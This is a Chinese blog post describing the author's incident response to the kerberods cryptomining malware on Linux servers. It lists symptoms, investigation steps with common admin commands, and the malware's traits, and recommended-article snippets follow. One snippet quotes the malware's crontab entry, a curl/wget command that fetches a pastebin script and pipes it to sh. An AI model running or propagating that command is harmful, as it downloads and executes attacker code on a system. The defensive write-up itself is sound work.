记一次挖矿病毒kerberods查杀经验

最新推荐文章于 2024-08-07 09:17:56 发布
最新推荐文章于 2024-08-07 09:17:56 发布
阅读量3.9w 收藏
点赞数 1
文章标签: linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dwavelet/article/details/117467045
版权

症状:

(1)首先预发布环境的一个页面经常打不开,很不稳定,查看原因是机器上的nginx经常挂掉(重启后几个小时后又会挂掉)。

(2)开发环境的register监控也时常挂掉,重启后可恢复,但很不稳定,症状跟上一台相似。

开始排查原因(思路):

(1)top查看发现有一个进程(类似系统进程)占用超高CPU,几乎打满,直接kill失败,会自行恢复

(2)怀疑是系统进程问题,排查一天无果,方向错误。

(3)使用cpulimit工具限制该进程,发现该进程被限制在可控范围,但会导致其他进程启动失败。

(4)查看/var/log/下系统日志无异常信息(异常信息被病毒抹去)。

(5)查看定时任务crontab -l、/etc/crontab发现有一条奇怪任务,经查询基本定位为挖矿病毒kerberods

(6)tcpdump发现机器在不断的与国外地址进行通信下载

(7)iptables使机器断绝与外界通信,发现进程自动消失,cpu消耗降下来。但过一会病毒会清空防火墙策略,继续拉起进程。(一度导致自己也与机器断开联系,请外地运维人员关闭防火墙才ssh上)

(8)netstat -anlp 发现有异常连接存在,为国外地址连接。根据路径又找到1个异常进程kingsing。杀掉该进程,及相关文件。

(9)再次打开防火墙,清除病毒进程。观察两天病毒不再恢复,成功。

 

病毒特性:

(1)超强的生存能力、隐蔽性、伪装性、传染性、病毒文件的大量性重复性。

(2)系统攻破后,攻击痕迹几乎被擦除(系统日志,文件篡改时间等等)

(3)病毒文件无法直接删除需要chattr -aij 文件名

(4)攻击防火墙,达到与外界联系

(5)伪装成系统进程,错误引导运维人员排查方向

(6)nc + shell反弹,ump脱壳

(7)病毒运行脚本难以获取

 

命令经验

lsof -p pid 进程的详细信息列出,包括连接信息

chattr -aij 文件名

tcpdump  抓包

netstat -anlp   查看网络连接等详细信息

nmap 112.25.75.61 需要先安装nmap (端口扫描)

/var/log/messages查看是否有来自其他未知ip的暴力破解

 

波浪理论~
关注
排查挖矿病毒
gender123的博客
03-28 4659
场景 最新发现linux服务器一直很卡,导致无法编译和其它相关操作。 排查分析 经top 查看原来是一个叫269 的进程一直抢占CPU,占比高达4000%。而该269 进程则是挖矿病毒进行高度伪装,即使是kill 掉该进程也无济于事,后面又会自动跑起来。 top - 19:29:19 up 1:24, 2 users, load average: 41.71, 41.75, 41.46 Tasks: 891 total, 3 running, 502 sleeping, 0 st..
某云服务器挖矿病毒查杀
忆年--尘封的记忆
04-28 906
接手的某项目部署于某云平台centos服务器上,由tomcat作为中间件提供应用,且购买了该平台的域名服务,从2019年底上线运营,一直运行比较平稳,可能还没正式用起来,用的人也不是很多吧。但凡事总有个但是,近期发现云服务器CPU资源占用稳定在50%以上,且系统盘各目录被持续定入core.1234之类的陌生文件,导致磁盘空间占用超高。 紧接着操作服务器,不管执行什么命令,都会有这个错误提示: ERROR: ld.so: object '/usr/local/lib/libs.so' f.
Linux服务器挖矿病毒彻底清除与防护实操指南
最新发布
boydoy1987的专栏
08-07 1039
Linux服务器在遭受挖矿病毒攻击时,会严重影响其性能和数据安全。本文将提供一套详细的操作步骤,结合实际案例,帮助您彻底清除Linux服务器上的挖矿病毒,并实施有效的防护措施。
“匿影”挖矿病毒半手动查杀
SkYe's Blog
04-04 1714
以防读者是中招,寻求解决方法的,所以就直接进入主题。 中毒特征 电脑反应迟 任务管理器中存在一个名为MicrosftEdgeCP.exe的进程 (可能)在任务计划程序库中有一项名为csapu的计划,详细请看图(来自金山毒霸): 解决方法 如果计划任务中有上图的触发任务,先删除。 进入C:\Users\Public删除红圈内文件: 其中MicrosftEdgeCP.ex...
遭遇“挖矿病毒——TagMiner以及杀毒的尝试
qq_42418728的博客
07-27 1467
后续可能被黑客再次关顾。这里可以看到,这个文件通过doos.pid文件生成随机的pid,然后一旦发现进程被杀死,就使用生成的pid启动新进程,这样就导致永远都无法靠kill-9命令杀死进程。由于需要校外访问处于内网中的服务器,于是服务器上面使用了内网穿透的软件,在开启内网穿透的两周后,服务器的显卡被匿名为“Python”程序的所高频占用。这里可以发现,此文件会启动后台数据库,收集挖矿数据,又发现病毒文件中包含一个叫nano.backup的文件,应该是用到了nano微型服务器进行挖矿数据传输。........
挖矿病毒/远控木马排查思路(Windows系统)
qq_51845659的博客
03-18 3287
挖矿病毒/远控木马排查思路(NOP Team团队发布的《Windows应急响应手册》学习笔
lifecalendarworm蠕虫病毒 Life Calendar查杀 蠕虫查杀 蠕虫病毒查杀 挖矿蠕虫查杀工具
03-09
lifecalendarworm挖矿蠕虫查杀工具 内含三款病毒查杀工具,都是国外知名软件,国内软件就不推荐了 Lifecalendarworm是一种恶意软件,也被称为"Life Calendar"或"LimeRAT",它是一种后门蠕虫,可以允许攻击者远程...
linux zigw挖矿病毒查杀
guanzhengyinqin的博客
01-27 1400
关于此病毒的参考文献: https://4hou.win/wordpress/?spm=a2c4e.11153940.blogcont657476.14.53ff2757GtnJxj&cat=6270 病毒介绍 https://yq.aliyun.com/articles/657476 病毒清理,不过有时会复发 https://blog.csdn.net/sayWhat_sayHello/...
录又一次挖矿病毒来袭
weixin_41762839的博客
06-08 738
各位小伙伴,今天又是一次因为tomat版本过低有漏洞,通过tomcat sql注入的挖矿病毒,这东西烦得很; 一大早刚来同事就跟我说服务器卡的要死,我心一惊,一想没准又是被黑,上去一看,果不其然,又中招了,防不胜防啊! top看了一下,卧槽,果然又是这个鬼东西! 果断查找进程位置; ll /proc/19778 根据以往经验,可能不全面,执行以下几步: 1.马上解锁降权 chattr -i /* chmod 444 ./* chmod -x ./* 2.改属...
一次服务器中了挖矿病毒的检测及删除方法
zhimeng1的博客
09-20 266
2023年9月18日,周一上班,有人反馈生产环境已经登录不了,陆陆续续反馈人越来越多,感觉大事不妙,脊背发凉,所有的网站和平台。5、突然想到公司做过等保测评,还有日志审计服务器,查询到下图,是通过跳板机,试错密码登录到内网,然后进行部署内部服务器的,这台服务器也是唯一一个不曾180天定时修改密码的服务器。确保您的服务器始终保持最新的安全补丁和软件版本,并定期进行安全审计和扫描,以确保您的服务器始终保持安全。中间docker修复,又挂掉,iptables又莫名被删除,一天来来回回的折腾七八次。
一次挖矿病毒处理过程
weixin_42433054的博客
12-13 9880
事件背景 深度威胁检测设备发现大量的DNS response of a queried malware Command and Control domain告警事件,尝试进行C&C攻击,根据分析,因终端感染病毒病毒文件尝试访问恶意网址,首先到DNS上进行解析,但是内网DNS无法解析到该域名,导致解析失败,同时该恶意域名被入侵检测设备检测到。现在明确终端中毒,本次过程通过深入发掘通信...
服务器中了挖矿病毒的检测及删除方法(如dhpcd,kdevtmpfs等)
阿拉修
01-10 1万+
最近一段时间,公司内网的linux服务器无故CPU占用很高,导致系统缓慢,严重影响研发部的正常工作。 经排查是部分linux服务器中了挖矿病毒,该病毒占满cpu进行挖矿,导致系统缓慢。 现将清除挖矿病毒的步骤梳理如下: 1. 检测服务器是否有挖矿病毒 使用top命令查看进程及占用cpu百分比, 如果该进程名称为随机字符串,且cpu占用非常高,则可能感染了挖矿病毒,见如下截图。 2. kill 病毒进程id kill掉CGroup的所有进程id systemctl status 病毒进程id 3. kil
太恐怖了,Linux服务器感染了kerberods病毒...
小詹学python的博客
05-05 847
作者:他二哥链接:https://www.cnblogs.com/kobexffx/p/11000337.html一、症状及表现1、CPU使用率异常,top命令显示CPU统计数数据均为0...
关于网站发现挖矿病毒的通知
mycncart的博客
01-01 1709
这两天有部分客户的opencart系统电商网站陆续出现错误提示,发现是挖矿CoinHive病毒程序所致。 侵入者一般修改了网站前台的Index.php和config.php文件, 同时还会上传一个ftp.php文件 修复方法: 恢复Index.php, config.php,删除其他新上传的文件。 目前初步判断是用户获得了服务器的诸如ftp信息,然后修改上传相关文件。
Linux挖矿病毒清理通用思路
dayouzi的博客
04-19 3891
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
挖矿病毒应急处置
2301_77977773的博客
07-22 1888
windows server2016虚拟机(切千万不要再物理机上运行挖矿病毒2024 年 7 月 22 日, 接到XX 局用户电话反馈局域网内有一些终端设备在运行一段时间后出现莫名卡顿,怀疑内网感染了挖矿病毒。客户要求查出来原因,确认出影响范围,删除相关病毒文件并找出如如何感染的,梳理出时间链。从而避免下次出现相同的问题。
kerberods挖矿病毒查杀及分析(crontab 挖矿 curl -fsSL https://p
weixin_33968104的博客
05-21 625
一. 症状及表现CPU使用率异常高,外出流量异常crontab异常,存在如下定时任务(基本上就可以确定了)[root@mdw ~]# crontab -l*/15 * * * * (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh12在...
《网络安全自学教程》- 挖矿病毒排查思路和处置步骤
热门推荐
wangyuxiang946的博客
05-05 2万+
首先根据CPU占用率确定确定挖矿进程,找到母体文件并清除。 而后是检查计划任务、启动项中,挖矿木马的持久化操作,杜绝复发。 最后通过账号、日志、母体文件等信息,溯源攻击路径。
linux挖矿病毒查杀
09-10
查杀Linux挖矿病毒,首先需要识别病毒的特征。根据引用提供的信息,挖矿病毒Linux系统中的一个重要特征是CPU占用率非常高。然而,为了更好地隐藏自己,一些挖矿病毒会控制CPU的占用率,使其保持在50%以下,这可能导致传统的进程监控命令如top无法查看到高占用CPU的进程。因此,如果系统出现异常的CPU占用率,但是无法通过传统命令看到高占用CPU的进程,这可能是挖矿病毒的一种表现。引用 中提到的挖矿病毒还可能修改DNS录,以防止病毒无法访问矿池或代理服务器。因此,检查"/etc/resolv.conf"文件的内容是否被修改也是一种查杀挖矿病毒的方法。如果发现DNS录被修改,可以通过还原DNS录来阻止挖矿病毒的连接。引用还提到,停止计划任务也是一种查杀挖矿病毒的措施。由于挖矿病毒通常会在系统启动时自动启动,可以检查计划任务以查看是否有可疑的任务,然后停止这些任务来阻止病毒的继续操作。综上所述,查杀Linux挖矿病毒的方法包括检查异常的CPU占用率、检查DNS录是否被修改、停止计划任务等。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

波浪理论~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值